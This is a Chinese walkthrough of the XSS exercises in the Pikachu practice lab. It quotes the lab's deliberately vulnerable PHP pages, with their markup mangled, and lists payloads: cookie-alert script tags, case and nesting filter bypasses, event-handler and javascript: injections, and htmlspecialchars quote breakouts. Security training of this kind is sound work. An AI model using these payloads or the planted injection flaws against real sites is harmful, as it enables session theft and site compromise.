pikachu-xss通关教程 反射型xss(get):?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_reflected_get.php){ $ACTIVE array(,,,,,,,active open,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; $html; if(isset($_GET[submit])){ if(empty($_GET[message])){ $html.p classnotice输入kobe试试-_-/p; }else{ if($_GET[message]kobe){ $html.p classnotice愿你和{$_GET[message]}一样永远年轻永远热血沸腾/pimg src{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png /; }else{ $html.p classnoticewho is {$_GET[message]},i dont care!/p; } } } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactive反射型xss(get)/li /ul!-- /.breadcrumb -- a href# stylefloat:right>反射型xss(post):scriptalert(document.cookie)/script存储型xss?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_stored.php){ $ACTIVE array(,,,,,,,active open,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; include_once $PIKA_ROOT_DIR.inc/config.inc.php; include_once $PIKA_ROOT_DIR.inc/mysql.inc.php; $linkconnect(); $html; if(array_key_exists(message,$_POST) $_POST[message]!null){ $messageescape($link, $_POST[message]); $queryinsert into message(content,time) values($message,now()); $resultexecute($link, $query); if(mysqli_affected_rows($link)!1){ $html.p数据库出现异常提交失败/p; } } if(array_key_exists(id, $_GET) is_numeric($_GET[id])){ //彩蛋:虽然这是个存储型xss的页面,但这里有个delete的sql注入 $querydelete from message where id{$_GET[id]}; $resultexecute($link, $query); if(mysqli_affected_rows($link)1){ echo script typetext/javascriptdocument.location.hrefxss_stored.php/script; }else{ $html.p idop_notice删除失败,请重试并检查数据库是否还好!/p; } } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactive存储型xss/li /ul!-- /.breadcrumb -- a href# stylefloat:right>DOM型xss?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_dom.php){ $ACTIVE array(,,,,,,,active open,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; include_once $PIKA_ROOT_DIR.inc/config.inc.php; include_once $PIKA_ROOT_DIR.inc/mysql.inc.php; if(isset($_GET[text])){ $haha 这里是后台的处理逻辑; } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactiveDOM型xss/li /ul!-- /.breadcrumb -- a href# stylefloat:right>javascript:alert(22); //里边用数字 javascript:alert(XSS); //不行 javascript:alert(XSS);方法二οnclickalert(1)onclickalert(333) onclickalert(333) # onclickalert(111)DOM-XSS-x:?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_dom.php){ $ACTIVE array(,,,,,,,active open,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; include_once $PIKA_ROOT_DIR.inc/config.inc.php; include_once $PIKA_ROOT_DIR.inc/mysql.inc.php; $html; if(isset($_GET[text])){ $html. a href# onclickdomxss()有些费尽心机想要忘记的事情,后来真的就忘掉了/a; } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactiveDOM型xss/li /ul!-- /.breadcrumb -- a href# stylefloat:right># onclickalert(111)XSS-盲打提交留言然后登录http://192.168.40.133:83/vul/xss/xssblind/admin_login.phpscriptalert(1)/script scriptalert(document.cookie)/script scriptalert(xss);/script scriptalert(xss)/script scriptalert(1)/script 大小写不需要 sCrIPtalert(XSS-Reflect01);/sCrIpT sCRiptalert(XSS-Reflect01);/sCRipt ScriPTalert(XSS-Reflect01);/sCrIpT scscriptriptalert(xss-reflect002);/script img src0 onerroralert(XSS-img)http://192.168.40.133:83/vul/xss/xssblind/admin_login.php ;admin/123456;xss之过滤:根据提示考虑绕过参考scriptalert(1)/script scriptalert(document.cookie)/script scriptalert(xss);/script scriptalert(xss)/script scriptalert(1)/script 大小写不需要 sCrIPtalert(XSS-Reflect01);/sCrIpT sCRiptalert(XSS-Reflect01);/sCRipt ScriPTalert(XSS-Reflect01);/sCrIpT scscriptriptalert(xss-reflect002);/script img src0 onerroralert(XSS-img)先测试一下payload:sCrIPtalert(122)/sCrIpT //大小写绕过 a herf# onclickalert(document.cookie) img src1 onerroralert(1)xss之htmlspecialchars先测试如下发现代码被原样输出htmlspecialchars()函数把预定义的字符转换为HTML实体。 预定义的字符是 • 和号 amp • 双引号 quot • 单引号 • 小于 lt • 大于 gt 我们也可以通过输入来排查什么字符被转义了 成为 amp 成为 quot 成为 #039 成为 lt 成为 gt 可用引号类型 ENT_COMPAT默认仅编码双引号 ENT_QUOTES编码双引号和单引号 ENT_NOQUOTES不编码任何引号我们可以发现和号、双引号和小于号、大于号被转义了而单引号可以正常使用οnclickalert(1)#οnmοuseοveralert(1)# οnclickalert(/xss/)avascript:alert(3333) // JavaScript伪协议 hack οnfοcusalert(5555) // 单引号闭合事件标签xss之href输出javascript:alert(111) // JavaScript伪协议?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_03.php){ $ACTIVE array(,,,,,,,active open,,,,,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; $html; if(isset($_GET[submit])){ if(empty($_GET[message])){ $html.p classnotice叫你输入个url,你咋不听?/p; } if($_GET[message] www.baidu.com){ $html.p classnotice我靠,我真想不到你是这样的一个人/p; }else { //输出在a标签的href属性里面,可以使用javascript协议来执行js //防御:只允许http,https,其次在进行htmlspecialchars处理 $messagehtmlspecialchars($_GET[message],ENT_QUOTES); $html.a href{$message} 阁下自己输入的url还请自己点一下吧/a; } } ? div classmain-content div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactivexss之href输出/li /ul!-- /.breadcrumb -- a href# stylefloat:right>?php /** * Created by runner.han * There is nothing new under the sun */ $SELF_PAGE substr($_SERVER[PHP_SELF],strrpos($_SERVER[PHP_SELF],/)1); if ($SELF_PAGE xss_04.php){ $ACTIVE array(,,,,,,,active open,,,,,,,,,,active,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,); } $PIKA_ROOT_DIR ../../; include_once $PIKA_ROOT_DIR.header.php; $jsvar; $html; //这里讲输入动态的生成到了js中,形成xss //javascript里面是不会对tag和字符实体进行解释的,所以需要进行js转义 //讲这个例子主要是为了让你明白,输出点在js中的xss问题,应该怎么修? //这里如果进行html的实体编码,虽然可以解决XSS的问题,但是实体编码后的内容,在JS里面不会进行翻译,这样会导致前端的功能无法使用。 //所以在JS的输出点应该使用\对特殊字符进行转义 if(isset($_GET[submit]) $_GET[message] !null){ $jsvar$_GET[message]; // $jsvarhtmlspecialchars($_GET[message],ENT_QUOTES); if($jsvar tmac){ $html.img src{$PIKA_ROOT_DIR}assets/images/nbaplayer/tmac.jpeg /; } } ? div classmain-content xmlnshttp://www.w3.org/1999/html div classmain-content-inner div classbreadcrumbs ace-save-state idbreadcrumbs ul classbreadcrumb li i classace-icon fa fa-home home-icon/i a hrefxss.phpxss/a /li li classactivexss之js输出/li /ul!-- /.breadcrumb -- a href# stylefloat:right>

相关新闻

最新新闻

SerenityOS 命令行选项解析指南:getopt 与 getopt_long 用法、返回值与底层实现

SerenityOS 命令行选项解析指南:getopt 与 getopt_long 用法、返回值与底层实现

SerenityOS 命令行选项解析指南:getopt 与 getopt_long 用法、返回值与底层实现 【免费下载链接】serenity The Serenity Operating System 🐞 项目地址: https://gitcode.com/GitHub_Trending/se/serenity 导读 本文以 getopt(3) 手册 为核心&a…

2026/10/1 19:32:24
轻量服务器还是ECS?大促云服务器选购与避坑实战指南

轻量服务器还是ECS?大促云服务器选购与避坑实战指南

每年大促节点,群里永远有人在问同一个问题:“38元的轻量服务器到底怎么抢?为什么我每次点进去都是已售罄?68元直购和99元的ECS我到底选哪个?”作为一个常年帮团队和自己采购云服务器的老用户,我太清楚这种纠…

2026/9/30 21:32:07
为 AI 代理的 Review 动作编写 Cedar 审批门控策略:review-agent-governance 策略编写实战指南

为 AI 代理的 Review 动作编写 Cedar 审批门控策略:review-agent-governance 策略编写实战指南

为 AI 代理的 Review 动作编写 Cedar 审批门控策略:review-agent-governance 策略编写实战指南 【免费下载链接】agents Multi-harness agentic plugin marketplace for Claude Code, Codex, Cursor, OpenCode, GitHub Copilot, and Google Antigravity 项目地址:…

2026/9/30 19:41:56
PaddleOCR 手写数学公式识别算法 CAN 实战指南:Counting-Aware Network 训练、评估与推理部署

PaddleOCR 手写数学公式识别算法 CAN 实战指南:Counting-Aware Network 训练、评估与推理部署

PaddleOCR 手写数学公式识别算法 CAN 实战指南:Counting-Aware Network 训练、评估与推理部署 【免费下载链接】PaddleOCR Turn any PDF or image document into structured data for your AI. A powerful, lightweight OCR toolkit that bridges the gap between i…

2026/10/1 19:32:23
Spring源码解析:构造器注入的类型转换与候选匹配机制

Spring源码解析:构造器注入的类型转换与候选匹配机制

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views …

2026/10/1 19:32:35
openai-agents-python 多模型接入指南:深入解析 AnyLLMModel 适配层与 any-llm 路由

openai-agents-python 多模型接入指南:深入解析 AnyLLMModel 适配层与 any-llm 路由

openai-agents-python 多模型接入指南:深入解析 AnyLLMModel 适配层与 any-llm 路由 【免费下载链接】openai-agents-python A lightweight, powerful framework for multi-agent workflows 项目地址: https://gitcode.com/GitHub_Trending/op/openai-agents-pyth…

2026/9/30 21:32:11

日新闻

周新闻

月新闻